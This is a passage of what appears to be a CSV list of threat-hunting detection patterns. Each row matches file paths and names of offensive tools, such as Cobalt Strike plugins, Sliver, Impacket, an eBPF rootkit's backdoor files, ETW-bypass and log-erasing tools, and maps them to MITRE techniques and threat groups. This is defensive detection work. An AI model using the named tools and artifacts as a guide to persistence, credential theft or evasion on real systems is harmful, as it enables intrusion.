Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","6986"
"*/Erebus-email.*",".{0,1000}\/Erebus\-email\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","6987"
"*/esentutl.py*",".{0,1000}\/esentutl\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6988"
"*/etc/cron.d/ebpfbackdoor*",".{0,1000}\/etc\/cron\.d\/ebpfbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","6991"
"*/etc/cron.weekly/tor*",".{0,1000}\/etc\/cron\.weekly\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6992"
"*/etc/default/tor",".{0,1000}\/etc\/default\/tor","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6997"
"*/etc/gsocket.conf*",".{0,1000}\/etc\/gsocket\.conf.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7001"
"*/etc/init.d/tor start*",".{0,1000}\/etc\/init\.d\/tor\sstart.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","7003"
"*/etc/init.d/tor stop*",".{0,1000}\/etc\/init\.d\/tor\sstop.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","7004"
"*/etc/init.d/tor*",".{0,1000}\/etc\/init\.d\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","7005"
"*/etc/init.d/tor*",".{0,1000}\/etc\/init\.d\/tor.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","7006"
"*/etc/init.d/tor2web*",".{0,1000}\/etc\/init\.d\/tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","7007"
"*/etc/kidlogger*",".{0,1000}\/etc\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","7008"
"*/etc/ld.so.preload && rm* process successfully hidden*",".{0,1000}\/etc\/ld\.so\.preload\s\&\&\srm.{0,1000}\sprocess\ssuccessfully\shidden.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7009"
"*/etc/nps/conf/*",".{0,1000}\/etc\/nps\/conf\/.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","7013"
"*/etc/passwd*/.sudo_as_admin_successful*",".{0,1000}\/etc\/passwd.{0,1000}\/\.sudo_as_admin_successful.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","7015"
"*/etc/proxychains.conf*",".{0,1000}\/etc\/proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#linux","https://x.com/mthcht/status/1827714529687658796","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","7016"
"*/etc/reverst/*",".{0,1000}\/etc\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","7019"
"*/etc/reverst/*",".{0,1000}\/etc\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","7020"
"*/etc/sudoers.d/ebpfbackdoor*",".{0,1000}\/etc\/sudoers\.d\/ebpfbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","7023"
"*/etc/sv/tor/log*",".{0,1000}\/etc\/sv\/tor\/log.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","7024"
"*/etc/systemd/gsc*",".{0,1000}\/etc\/systemd\/gsc.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7025"
"*/etc/systemd/system/IMDS.service*",".{0,1000}\/etc\/systemd\/system\/IMDS\.service.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","#linux","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","7027"
"*/etc/systemd/system/sliver.service*",".{0,1000}\/etc\/systemd\/system\/sliver\.service.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","7029"
"*/etc/tor/*.conf*",".{0,1000}\/etc\/tor\/.{0,1000}\.conf.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","7030"
"*/etc/xdg/autostart/evilxdg.desktop*",".{0,1000}\/etc\/xdg\/autostart\/evilxdg\.desktop.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","7034"
"*/eternal_checker.py*",".{0,1000}\/eternal_checker\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","7037"
"*/EternalHushCore.dll*",".{0,1000}\/EternalHushCore\.dll.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","7038"
"*/EternalHushFramework.git*",".{0,1000}\/EternalHushFramework\.git.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","7039"
"*/etumbot.profile*",".{0,1000}\/etumbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","7040"
"*/etw.cna",".{0,1000}\/etw\.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","7041"
"*/etw.x64.*",".{0,1000}\/etw\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","7042"
"*/etw.x86.*",".{0,1000}\/etw\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","7043"
"*/etw-fuck.cpp*",".{0,1000}\/etw\-fuck\.cpp.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","7044"
"*/etw-fuck.exe*",".{0,1000}\/etw\-fuck\.exe.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","7045"
"*/ETWHash/*",".{0,1000}\/ETWHash\/.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","7046"
"*/etwunhook.cpp*",".{0,1000}\/etwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","7047"
"*/etwunhook.exe*",".{0,1000}\/etwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","7048"
"*/etwunhook.git*",".{0,1000}\/etwunhook\.git.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","7049"
"*/evasion/evasion.go",".{0,1000}\/evasion\/evasion\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","7050"
"*/evasion/windows/*",".{0,1000}\/evasion\/windows\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7051"
"*/evasion_linux.go*",".{0,1000}\/evasion_linux\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","7052"
"*/evasion_windows.go*",".{0,1000}\/evasion_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","7053"
"*/EventCleaner.cpp*",".{0,1000}\/EventCleaner\.cpp.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","7054"
"*/EventCleaner.exe*",".{0,1000}\/EventCleaner\.exe.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","7055"
